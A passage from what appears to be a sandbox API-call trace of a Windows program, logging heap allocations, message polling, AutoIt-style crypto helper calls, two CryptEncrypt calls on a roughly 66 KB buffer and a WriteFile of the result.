Flags=0x0, Size=0x20) returned 0x2e54508 [0245.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0245.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0245.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0245.869] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x103c1) returned 0x2f347b0 [0245.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0245.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0245.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0245.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0245.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0245.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0245.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0245.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0245.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0245.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0245.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0245.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0245.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0245.871] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0245.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0245.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0245.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0245.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0245.872] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0245.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0245.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0245.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0245.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0245.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0245.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0245.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0245.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0245.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0245.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0245.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0245.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0245.872] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0245.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0245.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0245.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0245.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0245.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0245.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0245.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0245.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0245.872] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0245.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0245.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0245.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0245.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0245.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0245.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0245.873] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0245.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0245.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0245.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0245.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0245.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0245.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0245.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0245.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0245.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0245.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0245.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0245.873] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0245.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0245.873] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0245.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0245.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0245.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0245.874] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.874] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0245.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ed8 | out: hHeap=0x970000) returned 1 [0245.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0245.874] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0245.874] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0245.874] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.874] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0245.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a08 | out: hHeap=0x970000) returned 1 [0245.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.874] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0245.874] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0245.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0245.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0245.875] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.875] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.875] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.875] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.875] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.875] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0245.875] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0245.879] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0245.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0245.879] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e512f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0245.879] CryptEncrypt (in: hKey=0xa86f50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x103c1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x103c8) returned 1 [0245.880] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.880] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.880] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.880] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.880] CharLowerBuffW (in: lpsz="byte[66504]", cchLength=0xb | out: lpsz="byte[66504]") returned 0xb [0245.882] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.885] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.886] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0245.886] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0245.888] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0245.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0245.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51598, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0245.888] CryptEncrypt (in: hKey=0xa86f50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e7f320*, pdwDataLen=0x8cef60*=0x103c1, dwBufLen=0x103c8 | out: pbData=0x2e7f320*, pdwDataLen=0x8cef60*=0x103c8) returned 1 [0245.891] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.891] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.891] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.891] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.892] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0245.892] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.892] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0245.892] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0245.892] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0245.892] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.892] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0245.893] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0245.893] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.893] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0245.893] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.949] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.950] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.950] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.951] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f14010*, nNumberOfBytesToWrite=0x103c8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14010*, lpNumberOfBytesWritten=0x8cf5e4*=0x103c8, lpOverlapped=0x0) returned 1 [0245.953] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0245.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0245.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0245.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0245.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0245.954] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0245.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0245.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0245.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0245.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0245.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0245.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0245.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0245.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0245.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0245.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0245.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0245.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0245.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0245.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ab0 [0245.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0245.954] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0245.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ab0 | out: hHeap=0x970000) returned 1 [0245.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e68 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0245.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e30 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0245.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0245.955] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0245.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 